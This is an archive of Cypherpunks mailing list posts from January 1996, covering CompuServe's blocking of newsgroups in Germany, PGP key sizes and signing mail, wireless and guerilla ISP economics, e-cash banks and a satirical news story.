>> ever get a true democracy.

DV> One of the things Adolph Hitler and Bill Clinton have in common is
DV> that both were democratically elected leaders.

	That, and that the elections were bad decisions, without much
better alternatives at the time );.  But as much as I dislike Clinton, I
think that that's about as far as a comparison can go.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cees de Groot" <cg@bofh.cdg.openlink.co.uk>"Cees de Groot" <C.deGroot@inter.nl.net>
Date: Thu, 4 Jan 1996 03:15:55 +0800
To: mianigand@unique.outlook.net
Subject: Re: What to do about Germany
In-Reply-To: <199601030019.SAA23577@unique.outlook.net>
Message-ID: <199601031052.LAA09691@bofh.cdg.openlink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What the German goverement threatned to do was inexcusable, but 
> something can be done about it.
> 
Sorry, but the "German government" did not threaten to do anything at all.
A (conservative-ish) prosecutor started an _investigation_, which
in his eyes was nothing more than executing the law (and sorry, that's
what the guy is paid for).

If the German government did something wrong, it was accepting a law
for the protection of minors (Jugendschutzgesetz), which says that
minors should not be allowed to have access to booze, dope and porno.

Please tell me such laws do not exist in your country...

If anything, this whole bussiness will be one step in the correct
direction:
- Either some modus operandum is found which makes it clear for everybody
  how to offer pornographic material and comply with the law at the
  same time (cf. the First Virtual account ID's you have to enter at
  all those sites pointing to www.infohaus.com - in the US, this modus
  operandum seems to be ``proof of having a credit card'');
- Or the German Government learns about the lack of frontiers on the Net, 
  and gives up (which is highly improbable).
I think the first point is most realistic (especially when considering that
German prosecutors don't have the option of not prosecuting when they hear
about a felony, like for example Dutch prosecutors). Given my experience
with the German government, however, it will take some time for them to
realize that they need a set of rules in this area.

-- 
Cees de Groot, OpenLink Software		     <C.deGroot@inter.NL.net>
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
 -- Any opinions expressed above might be mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 4 Jan 1996 09:38:20 +0800
To: cypherpunks@toad.com
Subject: Re: US calls for measures against Internet porn
In-Reply-To: <199601030549.VAA11513@infinity.c2.org>
Message-ID: <ckufKbm00YUrM5yBUm@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 2-Jan-96 Re: US calls for measures
a.. by sameer@c2.org 
>         Just to offer another story of the cluelessness of some
> people: I've been receiving a number of complaints about one of my
> users who has gotten into a flamewar on Usenet. They claim that
> flaming is a violation of FCC regulations. (Maybe eventually it will
> be.. sigh.)

This apparently is becoming a common tactic among would-be censors. One
example involving a web site and complainants from Carnegie Mellon
University and the University of Pittsburgh is at:
   
    http://joc.mit.edu/attack.html

And more on Compuserve... Excepts from today's Washington Post:

   BERLIN, Jan. 2 -- German authorities say the CompuServe on-line
   service decided on its own which sexually explicit Internet forums to
   ban its 4 million customers from viewing.
   
   In addition, prosecutors reiterated today that they never explicitly
   threatened CompuServe Inc. with criminal charges.
   
   The statements appear to conflict with CompuServe's explanation last
   Thursday of why it blocked access to 200 newsgroups. But a CompuServe
   spokeswoman repeated the company's initial explanation today, saying
   German authorities specified which newsgroups should be banned...
   
   Munich senior public prosecutor Manfred Wick said today that his
   office did not provide CompuServe any such list as part of its
   investigation of child pornography on the Internet. "We did not make
   any stipulations. It was the decision of CompuServe alone," he said.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Thu, 4 Jan 1996 02:29:08 +0800
To: "Douglas F. Elznic" <delznic@storm.net>
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <2.2.16.19960103035752.3e0fe0d8@terminus.storm.net>
Message-ID: <5568et6trn.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3937.1071713532.multipart/signed"

--Boundary..3937.1071713532.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

"Douglas F. Elznic" <delznic@storm.net> said:

DE> What is the deal with the 2047 bit keys? How do you produce one? IS
DE> it compatible with international versions?

	When you do 'pgp -kg', you are asked to pick a PGP key size, and
given 3 preselected sizes.  You can select one of the sizes, or enter
your own choice.  Actually, the pgp source will allow 2048, but there is
a bug in the DOS version (from the compiler) that limits that one to
2047.  The international version is identical to the domestic one,
except for the RSA code, so everything is interoperable.  There is a
hacked version that allows 4096 bit keys, and the supersized keys are
incompatible.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.


--Boundary..3937.1071713532.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4yCgpp
UUNWQXdVQk1PckUyRnZCZ1JjZGtHd0ZBUUhCZkFRQWxlaXdBaURKbFhsbGlj
ckk1UmtmQ1VQd0gxT2xvYUFmCnRQRTRLRVNlL09UamE0VUo0SVVEQ3hhbkRv
TzZ2aDkraitacVNaR0l0TDdkaXUvbWtkMnZGMnVEQmpPay9ZS24KbXBZN0Zt
OHIzWTZjTFk0Y2NoOXJZV0YwUTE5UEptdEtpc1N4Z1RGcjZlRllSbGh5MDdV
SXVYRjZXTUNNZVgvcgp1eGdzZm9sVURJRT0KPVdIRGQKLS0tLS1FTkQgUEdQ
IE1FU1NBR0UtLS0tLQo=
--Boundary..3937.1071713532.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 4 Jan 1996 06:13:06 +0800
To: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <Pine.3.89.9601021822.A18697-0100000@unicorn.com>
Message-ID: <Pine.SOL.3.91.960103115011.4602C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jan 1996, Mark Grant, M.A. (Oxon) wrote:

> About ten years ago a group I was involved with were thinking about
> putting something into space as a publicity stunt. One company we talked
> to claimed they could put 1 kg into orbit on one of their sounding rockets
> for about $ 30,000 (that's a 1 kg satellite, not $ 30,000 per kg). How

Hey! I've just had an epiphany. HOToL promised much cheaper costs to put 
things in LEO. The initial design was finished and tested, but nobody 
would provide the funds for the second round or implementation (probably 
because it wasn't French enough :) 

Nowdays, anything involving the Internet automatically gets ridiculous 
levels of funding. If we can just get John Markoff or Walter Mossberg to 
declare HOTol to be an Internet Technology they'll be able to use 
banknotes as heat shields.

Simon Spero, BSc. Eng, ACGI

{Ok, this whole thread is noise - I'm up to my eyeballs doing PKCS in 
 java, and I canna take no more :)}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 4 Jan 1996 06:18:29 +0800
To: cypherpunks@toad.com
Subject: Re:US calls for measures against Internet porn
Message-ID: <9601032009.AA01109@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>>         WASHINGTON DC (Reuter) - The US called Sunday for improved
>>management of the Internet to prevent people seeing pornographic
>>material on the world computer network.


I feel so much better, having the burden of deciding what I can see or
read lifted from my weary shoulders.  

Maybe a ban on politicians appearing in the media?  (Some might consider
it an obscenity.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 4 Jan 1996 09:07:53 +0800
To: Steve Gibbons <steve@aztech.net>
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <v02120d0dad108cd6b006@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:08 1/3/96, Steve Gibbons wrote:

>I'd be interested in seeing your numbers and cost breakdowns.  I'd really be
>interested in the up-front costs that would be associated with the equipment
>and set-up time/training that will help "insure" data privacy over wideley
>broadcast media.  The up-front costs for ~T1 capable tranceivers isn't
>insignificant either.  I figure ~$10K up front (maybe half of that, maybe twice
>when you include management overhead)  Amortize  over 3 years, and compare.

You can get by with one base station per five remote receivers. This is no
different than the 5/1 to 12/1 oversale ratios common to the T1 ISP
business. As long as you prohibit resale of bandwidth and specialize in
hooking up business lans you'll have no problems with this layout. Latency,
which really is more important than bandwidth in many cases, is actually
better using wireless than using traditional T1s. The set-up costs are also
less to the customer than if they used a regular ISP. Only difference is
that by paying the set-up fees they are buying the equipment for _you_. So
once they leave your ISP, you still have all the hardware :-)

>All of this is assuming that the bandwidth is available on the airwaves to
>handle ~200 ~T1s.  (If we're talking $200.00/mo. for T1, sign me up tomorrow,
>and my neighbor, and his, and hers, and...  *poof* no more bandwidth in a
>"decently" populated metro area or even a downtown.

900MHz spread spectrum can get a bit crowded, but you don't need to sell
200 connections to make money. Breakeven based on competitive montly fees
(in my original calculations that ment less than the lowest priced local
ISP) is about 10 customers. Of course this is not at <$200 per customer.
That figure is the lowest possible if you max out a T3, but still, no
landline based ISP will be able to deliver bandwidth that cheap. Remember
that the fees _include_ the cost for the pipe. Breakeven based on the
set-up fees (meaning zero dollars investment by you) is about 18 customers.

>I apologize if this is off topic, but the crypto part still applies (moreso,
>even!) to broadcast over the airwaves.

All major wireless vendors offer DES encryption at about $300 per node.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 4 Jan 1996 02:34:14 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve *hasn't* banned newsgroups
Message-ID: <2.2.32.19960103180226.006a9ffc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:30 PM 1/3/96 +0100, Anonymous wrote:
>   If you do this, you'll find out very quickly just how empty (or at
>least how slippery) slogans like "the Internet routes around censorship"
>are: if your efforts pay off and you steer even a fraction of CIS's
>traffic toward the remaining open newsservers, they'll close faster than
>you can say "alt." So before you do it, think about how the net will route
>around sysops closing their servers off from the net.
>
>Hieronymous

You mean that the thirty-some odd open news servers listed on
http://dana.ucc.nau.edu/~jwa/open-sites.html might get swamped.  Then the
CIS refugees will be forced to pay Sameer the massive $12.50 (?) a month for
a net-access-only account and read off of c2.org's server.  (Or any of the
thousands of sites worldwide one can open a shell account on.)

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Thu, 4 Jan 1996 04:21:59 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Compuserve *hasn't* banned newsgroups
In-Reply-To: <2.2.32.19960103180226.006a9ffc@panix.com>
Message-ID: <199601031919.NAA02071@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> You mean that the thirty-some odd open news servers listed on
> http://dana.ucc.nau.edu/~jwa/open-sites.html might get swamped.  Then the
> CIS refugees will be forced to pay Sameer the massive $12.50 (?) a month for
> a net-access-only account and read off of c2.org's server.  (Or any of the
> thousands of sites worldwide one can open a shell account on.)

And if the feds come knocking on Sameer's door, the refugees can go to the
Netherlands or some other country with respect for privacy. When netscape
releases an official, untimed browser with ssl news and mail built in, one
that lets users pick their own CAs, we'll have reached escape velocity. 

I think this all comes back to anarchy.  Anarchy as it relates to
cyberspace isn't a political ideology or a vision of how things ought to
be.  Rather it's a realistic analysis of the net dynamic as it is, a
natural and almost unavoidable consequence of the interaction of the
market and the technology.

Our opponents' position is weak, despite their having the massive power of
the government behind them.  In order for them to pull out a victory,
they'll have to impose extraordinarily draconian restrictions on crypto
very quickly, and they'll have to do it in the face of overwhelming public
opposition as well as strong resistance from business.  On top of that,
they'll have to secure an unprecented degree of international cooperation
to enforce rules net wide, something that's probably going to prove
impossibly difficult for them.  Again, they've got to do this quickly,
because genies are popping out of bottles all over the place. 

It's not impossible for them to pull this off, but I think the smart
money's with us.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Thu, 4 Jan 1996 04:36:37 +0800
To: cypherpunks@toad.com
Subject: Re: Unmuzzy Explained
Message-ID: <199601031924.NAA24001@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


>So is the idea beyond this that if file or a group of files were to 
>be distributed over many computers (possibly hundreds or more) then 
>none of the computers would be "responsible" for their content? I would 
>think that any participant in the network would have to claim full 
>responsibility for the content, assuming the file(s) could be accessed 
>from any of the participating servers.
>
Okay.  So what if serveral groups of computers, in public FTP directories,
allowed anonymous ftp uploads of "parts" of a file that would be construde
as bad content.  The only way to assemble the file is to download several
parts of it from serveral diffrent servers and assemble the file on your
system.  Thus the illegal file isn't illegal until its assembled.  Sorta
like switchblade knives.  Lots of places can sell the parts legally, they
just can't sell the assembled product.  Would the servers that contain
"parts" of the file be responsible for the content?

(andr0id@midwest.net  callsign: N9XLM)
( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Thu, 4 Jan 1996 04:50:22 +0800
To: jk@digit.ee (Jyri Kaljundi)
Subject: Re: Starting an e-cash bank
In-Reply-To: <Pine.SOL.3.91.960103204303.5486B-100000@jaramillo.digit.ee>
Message-ID: <199601031925.NAA02085@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> What does it take to be called a bank?

Is it necessary to be called a bank?  I've got a storefront in Chicago.  
What would prevent me from opening up a Mark Twain account and buying and 
selling ecash on floppies, in person?  Do account holders have to agree 
not to do that before Mark Twain gives them an account?  Is it illegal?

The currency exchange model almost seems more appropriate for most users
than the bank model.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jan 1996 07:07:10 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Windows Eudora and PGP
Message-ID: <m0tXajI-00093HC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 AM 1/3/96 -0800, you wrote:
>At 09:43 AM 1/3/96 -0800, Jim Bell wrote:
>
>>(BTW, I use Eudora, and I have PGP.  Could somebody explain how to PGP-sign
>>messages, ideally EASILY?)
>
>I use Eudora as well.  It is not as easy as I would like.  You have a couple
>of options:
>
>1)  Use cut-and-paste into Private Idaho.  Private Idaho will allow you to
>paste back into Eudora.  (Or you can send out from Private Idaho directly.)
>This option is useful becuase it supports nyms and chaining of remailers.
>
>2)  Get one of the standard Windows PGP shells and paste into that.  After
>signing, you will have to repaste into Eudora again.
>
>These seem to be the only options.  I am not certain if there is a standard
>DDE or OLE interface that could be used to feed message information back and
>forth between Eudora and some other app.  There have been a number of
>promises of Eudora/PGP integration, but nothing has materialized yet.

[sigh]  Just what I thought, no easy solutions.  Well, for now I'll just
skip signing; I haven't had any problem (that I know of...knock on silicon)
with forged messages, and my normal posts are so enthusiastically anarchical
and inflammatory that the only way anybody could really embarrass me is to
forge a message, ostensibly from me, saying I agreed with some governmental
activity somewhere.


>There are no easy answers I know of...
>
>If you need a copy of Private Idaho, I can point you to a web site or bring
>a copy along to the meeting on the 20th.

Please do...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Thu, 4 Jan 1996 02:58:47 +0800
To: Sten Drescher <dreschs@austnsc.tandem.com>
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <5568et6trn.fsf@galil.austnsc.tandem.com>
Message-ID: <Pine.LNX.3.91.960103133137.3229F-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> "Douglas F. Elznic" <delznic@storm.net> said:
> 
> DE> What is the deal with the 2047 bit keys? How do you produce one? IS
> DE> it compatible with international versions?
> 
> =09When you do 'pgp -kg', you are asked to pick a PGP key size, and
> given 3 preselected sizes.  You can select one of the sizes, or enter
> your own choice.  Actually, the pgp source will allow 2048, but there is
> a bug in the DOS version (from the compiler) that limits that one to
> 2047.  The international version is identical to the domestic one,
> except for the RSA code, so everything is interoperable.  There is a
> hacked version that allows 4096 bit keys, and the supersized keys are
> incompatible.

Are you sure it's a bug in the DOS version? When I did a pgp -kg in my 
UNIX shell (US version 2.6.2) I also entered 2048 bits and it too 
created a 2047 bit key instead.

Why is there a limit to the size of the key anyway? It's too bad PGP 
doesn't support any size key (within reason).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 4 Jan 1996 07:01:40 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Starting an e-cash bank
Message-ID: <v02120d0fad10a42529be@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:25 1/3/96, Alex Strasheim wrote:
>> What does it take to be called a bank?
>
>Is it necessary to be called a bank?

To get a license for the bank software from DigiCash, you have to convince
them that you are a major player in whatever country you are in or have to
offer some exceptional additional value to the service.

>I've got a storefront in Chicago.
>What would prevent me from opening up a Mark Twain account and buying and
>selling ecash on floppies, in person?

You touched on a very important issue: the party converting currency into
Ecash does not have to be the Ecash bank. There have been discussions that
in the future one should be able to buy Ecash on floppy at the local
supermarket, similar to today's prepaid calling cards. I certainly would
like to see that happen rather sooner than later.

It is my understanding that you would be welcome to issue MT Ecash for USD.
Here is another business opportunity: MT Bank does not allow the purchase
of Ecash by credit card, since they consider the risk of chargebacks
unacceptable. This might be a market for a third party.

>Do account holders have to agree
>not to do that before Mark Twain gives them an account?  Is it illegal?

MT Bank doesn't mind. IANAL.

<speaking only for myself>

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Thu, 4 Jan 1996 06:22:57 +0800
To: cypherpunks@toad.com
Subject: Someone wanted to give PGP lecture at CSI conference
Message-ID: <199601032007.OAA26735@parka>
MIME-Version: 1.0
Content-Type: text


I'm looking, on behalf of the COmputer Security Institute, for someone who
is willing to give a 1.5 hour PGP primer at their summer conference in
SF.  They don't pay, but they will give you free admission into the conference
(and two bad hotel conference meals).

I speak at their conferences; they're not a bad lot.  Interested parties 
should email me directly.

Bruce

**************************************************************************
* Bruce Schneier
* Counterpane Systems         For a good prime, call 391581 * 2^216193 - 1
* schneier@counterpane.com
**************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Thu, 4 Jan 1996 19:26:06 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla ISPs
In-Reply-To: <Pine.SUN.3.91.960103143229.11291B-100000@hertz.isr.umd.edu>
Message-ID: <199601032207.OAA03764@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Thomas Edwards writes:

> [ microcellular nets ]
>
> But how can these things compete with @Home, which is promising 10 Mbps 
> in and 128 kbps out of homes with cable modems?  

I'm skeptical about cable modems---few cable providers have adequate
return paths, and everyone competes for the downlink bandwidth.
Broadcast is not the right architecture.

Any systems in actual operation?  How many users do they support?

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Thu, 4 Jan 1996 06:22:07 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <Pine.LNX.3.91.960103133137.3229F-100000@micro.internexus.net>
Message-ID: <5520ph6naq.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Laszlo Vecsey <master@internexus.net> said:

LV> Are you sure it's a bug in the DOS version? When I did a pgp -kg in
LV> my UNIX shell (US version 2.6.2) I also entered 2048 bits and it too
LV> created a 2047 bit key instead.

	I had heard elsewhere that there was such a bug.  My mistake,
then.

LV> Why is there a limit to the size of the key anyway? It's too bad PGP
LV> doesn't support any size key (within reason).

	As I understand it (which, given my previous error, is in
serious doubt), after a point the IDEA session keys become far easier to
use a brute force attack on than the RSA keypair.  Since I think that
increasing the RSA keysize is supposed to double the attack time, if a
RSA key size of N takes as much time to break as 1 IDEA key, making the
RSA key N+8 bits makes it better to break the IDEA keys of 200 messages
rather than the RSA key.

	Does anyone know if there are comparisons of estimates of the
time to break the IDEA session keys used in PGP vs time to break RSA
keys of various sizes?

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Thu, 4 Jan 1996 06:45:07 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <Pine.LNX.3.91.960103133137.3229F-100000@micro.internexus.net>
Message-ID: <55zqc557z8.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3937.1071713532.multipart/signed"

--Boundary..3937.1071713532.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit


(sorry if this is a duplicate)

Laszlo Vecsey <master@internexus.net> said:

LV> Are you sure it's a bug in the DOS version? When I did a pgp -kg in
LV> my UNIX shell (US version 2.6.2) I also entered 2048 bits and it too
LV> created a 2047 bit key instead.

	I had heard elsewhere that there was such a bug.  My mistake,
then.

LV> Why is there a limit to the size of the key anyway? It's too bad PGP
LV> doesn't support any size key (within reason).

	As I understand it (which, given my previous error, is in
serious doubt), after a point the IDEA session keys become far easier to
use a brute force attack on than the RSA keypair.  Since I think that
increasing the RSA keysize is supposed to double the attack time, if a
RSA key size of N takes as much time to break as 1 IDEA key, making the
RSA key N+8 bits makes it better to break the IDEA keys of 200 messages
rather than the RSA key.

	Does anyone know if there are comparisons of estimates of the
time to break the IDEA session keys used in PGP vs time to break RSA
keys of various sizes?

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.


--Boundary..3937.1071713532.multipart/signed
Content-Type: application/octet-stream; name="pgp00001.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00001.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4yCgpp
UUNWQXdVQk1PcnBZbHZCZ1JjZGtHd0ZBUUgvb0FRQXNyeTdPdjYyRzkzR1pC
UEU3Z3huSUw3VjBZeUxwbzFaCm5mTldobGlIelUyUzh5UTA0U0NaVjJ0dFFt
QjlWY0RROGFHOWVzMEZLeTVZQ2plTUZxdnE2Q2Z1OVQrV0ZFMDQKT1RQR2dI
dlVEdElZem9vU3NscjVsV1NhK0tsSU1GbHV4VWY2Zkk3TG9leThrdm1NY1RQ
elRjTDdzTU5LRTRMSQpzSi9tdEpxUUFmbz0KPTF2WkUKLS0tLS1FTkQgUEdQ
IE1FU1NBR0UtLS0tLQo=
--Boundary..3937.1071713532.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 4 Jan 1996 05:50:35 +0800
To: cypherpunks@toad.com
Subject: Guerilla ISPs
Message-ID: <Pine.SUN.3.91.960103143229.11291B-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



On LECs attacking ISPs, it is interesting to note that several 
medium-sized ISPs in Maryland which have over 100 phone lines are now 
getting them delivered by fiber direct to the ISP.

This is nothing new - what is news is that some of these fiber setups use
a form of SLC-96 systems which are incapable of carrying data traffic over
21 kbps with modern 28.8 kbps modems. 

Nobody new what the problem was for a long time, until finally Bell 
Atlantic admitted that there were some bandwidth limitations in some 
SLC-96 setups.  They went on to note that the tarrif required them to 
carry only acceptable voice and 4800 bps communication, nothing more, and 
that these ISPs were basically stuck with substandard lines.

The ISPs involved are now looking into alternative local dialtone, but it is 
few and far between.  Bell Atlantic is looking to get into the Internet 
business...perhaps they will engineer their own dialups properly, while 
giving low-data-rate fiber connections to ISPs?

And on the radio-last-mile service, I used to be enthusiastic about it, 
but I am no more.  It is pretty impractical to discuss VHF or UHF 
frequencies for real net connectivity, there just isn't enough bandwidth 
to be practical.  900 MHz and higher appear to be the best solution, 
using CDMA spread-spectrum in a microcellular environment.  Metricom 
(http://www.metricom.com) has CDMA microcellular modems which get 14.4 
kbps equivalent throughput in the 900 MHz region, and they have a large 
microcellular network already set up in the Bay Area with Internet 
connectivity.  Once 2 GHz technology becomes cheap enough (that's GaAs 
chips instead of Si), I can imagine wide-scale 56kbps service over 
microcellular networks.

But how can these things compete with @Home, which is promising 10 Mbps 
in and 128 kbps out of homes with cable modems?  

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Fri, 5 Jan 1996 07:46:24 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Compuserve *hasn't* banned newsgroups
In-Reply-To: <2.2.32.19960103180226.006a9ffc@panix.com>
Message-ID: <Pine.SUN.3.91.960103144056.6633A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jan 1996, Duncan Frissell wrote:

> You mean that the thirty-some odd open news servers listed on
> http://dana.ucc.nau.edu/~jwa/open-sites.html might get swamped.  Then the
> CIS refugees will be forced to pay Sameer the massive $12.50 (?) a month for
> a net-access-only account and read off of c2.org's server.  (Or any of the
> thousands of sites worldwide one can open a shell account on.)

Cheaper still (and more compatible with GUI newsreaders) try AltNet:

> telnet news.alt.net nntp
Trying 204.137.156.2...
Connected to tofu.alt.net.
Escape character is '^]'.
200 Mail info@alt.net for info about $5/month NNTP access (posting ok).

If you can't afford $5/month, you're not using Compu$erve.

Joe
(not affliated with AltNet, just giving them a random plug)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 4 Jan 1996 07:39:25 +0800
To: cypherpunks@toad.com
Subject: Re:US calls for measures against Internet porn
In-Reply-To: <9601032009.AA01109@argosy.MasPar.COM>
Message-ID: <199601032247.OAA00603@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


My original post, "US calls for measures against Internet porn" was a
satire. The entire point was that, by changing a few words in the
"China calls for measures against Internet porn" story, a statement by
a totalitarian communist regime could be made to look like official US
policy. Obviously, the project was a success, as people are taking it
seriously in spite of the fact that it had telltale clues, and that
the original source was revealed.

The exact changes were:

BEIJING -> WASHINGTON DC
China -> The US
State Council -> Clinton administration's State Council
Communist Party -> Republican Party
Xinhua news agency -> the Associated Press
personal computers in China -> modems in the US

That's it. None of the actual words quoted from the statement were
changed. Frightening, isn't it?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 4 Jan 1996 11:34:58 +0800
To: cypherpunks@toad.com
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <Pine.LNX.3.91.960103133137.3229F-100000@micro.internexus.net>
Message-ID: <Pine.LNX.3.91.960103151110.105A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


